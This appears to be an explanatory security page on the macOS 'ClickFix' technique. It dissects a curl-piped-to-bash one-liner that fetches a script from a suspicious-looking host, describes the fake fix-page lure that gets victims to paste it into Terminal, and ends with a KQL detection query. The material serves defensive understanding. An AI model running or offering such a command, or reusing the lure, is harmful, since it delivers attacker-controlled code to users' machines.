Clickfix curl (Mac)
Download and execute a shell script from a remote URL via curl piped to bash. Same technique as the Windows IEX variant (download from URL, execute). Runs in Terminal.
curl fetches the URL. The -s flag runs silently with no progress bar, reducing suspicion.
curl -s The URL hosts a shell script. The attacker controls the content. Change the file and the same command delivers a different payload.
https://fix-support.icu/pmPipes the downloaded content (stdout) directly into the next command as stdin.
| bash reads the piped content and executes it as a shell script.
bash- 1
Victim runs the command
The bash one-liner is presented on a fake support or fix page. The page copies the command to the clipboard, then prompts the victim to open Terminal (Cmd+Space, type Terminal, Enter), paste with Cmd+V, and press Enter.
- 2
HTTP download
curl -sfetches the content fromhttps://fix-support.icu/pm. The URL hosts a shell script. - 3
Execute
The pipe sends the downloaded content to
bash, which executes it. The script could launch Calculator, run further downloads, or perform other actions.
- •One-liner. A single command is easy to paste and run. Low friction for the victim.
- •Seems legitimate. Victims are used to captchas and security checks. A fake reCAPTCHA-style prompt feels familiar and trustworthy.
- •Full script control. The attacker can host any shell script. Change the file at the URL and the same command delivers a different payload.
- •Attacker-controlled at any time. Update the script on the server. No need to redistribute links or documents.
- •URL in command. The domain is visible in the command. Blocklists and URL filtering can help defenders.
DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine contains "curl" and ProcessCommandLine contains "|" and ProcessCommandLine contains "bash" | project Timestamp, DeviceName, AccountName, ProcessCommandLine